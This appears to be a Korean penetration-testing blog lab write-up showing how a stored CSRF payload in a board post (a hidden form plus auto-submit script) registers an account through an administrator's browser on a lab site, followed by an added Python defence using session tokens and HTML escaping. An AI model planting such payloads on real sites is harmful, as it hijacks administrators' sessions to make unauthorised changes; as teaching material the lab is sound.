Linux/Penetration Testing

Registering a member using CSRF

GGkeeper 2022. 1. 25. 19:53

Lab> Registering a member using CSRF

-- Conditions --
1. Menu
- Home -> Sign up

2. User information
ID: blackhat2
Password: 777777
Name: 블랙햇2
Email: blackhat2@naver.com
-- Conditions --


1. Analysis
The legitimate sign-up request, as captured when a user submits the registration form:
POST /registerok.html HTTP/1.1
Host: 192.168.108.101
Content-Length: 96
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.108.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.108.101/register.html
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9
Cookie: PHPSESSID=3ovodk4h07880b72saa165ru34
Connection: close

gopage=%2Fregister.html&userid=abc123&userpw=111111&username=abc123&useremail=abc123%40naver.com


The same body, URL-decoded into its individual parameters:
gopage=/register.html
userid=abc123
userpw=111111
username=abc123
useremail=abc123@naver.com

2. Writing the board post
The attacker creates a post with the following content. The post body carries a hidden form whose fields mirror the captured sign-up request, followed by a script that submits it automatically.

Name: Attacker
Title: Create registered user
Password: 1
Content:
Hello admin.

<form id=csrftest method=POST action=/registerok.html>
<input type=hidden name=gopage value=/register.html>
<input type=hidden name=userid value=blackhat2>
<input type=hidden name=userpw value=777777>
<input type=hidden name=username value=블랙햇2>
<input type=hidden name=useremail value=blackhat2@naver.com>
</form>
<script>document.getElementById("csrftest").submit();</script>

3. Reading the post
The moment the administrator opens the post, the hidden form is submitted from the administrator's browser (with the administrator's session) and the user is registered.

4. DB check
Checking the member table confirms that 블랙햇2 has been registered.
MariaDB [mywebsite]> select * from member order by no desc limit 1\G
*************************** 1. row ***************************
       no: 8
 username: 블랙햇2
   userid: blackhat2
 userpass: *9A229395F8379662D1576C5E2CC5EAFA7F726820  <-- 777777
useremail: blackhat2@naver.com
   ipaddr: 192.168.108.1
     date: 2022-01-22 23:43:26
1 row in set (0.00 sec)
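A defender-side counterpart to this lab, added here as an example and not part of the original post or the target site's PHP: a Python gate for /registerok.html that requires a session-bound token, plus output encoding of board content. Only the site origin comes from the capture; the function names, the csrf_token field and the session dict are assumptions.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlparse

# Site origin taken from the lab capture; everything else is hypothetical.
SITE_ORIGIN = "http://192.168.108.101"


def issue_csrf_token(session: dict) -> str:
    """Put a fresh random token in the server-side session and return it so
    register.html can embed it as a hidden field next to userid/userpw."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def registerok_allowed(headers: dict, body: str, session: dict) -> bool:
    """Gate for /registerok.html: the request must come from the site's own
    origin AND carry the token stored in the session.  The origin check alone
    would pass the lab's attack, because the auto-submitting form lives on a
    board page of the same site, so Origin/Referer look legitimate."""
    src = headers.get("Origin") or headers.get("Referer", "")
    p = urlparse(src)
    if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
        return False
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(submitted.encode(), expected.encode())


def render_post_content(text: str) -> str:
    """Output-encode board content before it is shown to the administrator, so
    the stored <form> and <script> are displayed as text instead of executed.
    Without this, attacker script running on the page could read the token."""
    return html.escape(text, quote=True)


# Constructed inputs: the form body the lab's hidden form sends (no token), and
# the same submission once register.html includes the token.
LAB_HEADERS = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/register.html"}
LAB_BODY = ("gopage=%2Fregister.html&userid=blackhat2&userpw=777777"
            "&username=%EB%B8%94%EB%9E%99%ED%96%872&useremail=blackhat2%40naver.com")

if __name__ == "__main__":
    session = {}
    print(registerok_allowed(LAB_HEADERS, LAB_BODY, session))  # False
    tok = issue_csrf_token(session)
    print(registerok_allowed(LAB_HEADERS, LAB_BODY + "&csrf_token=" + tok, session))  # True
```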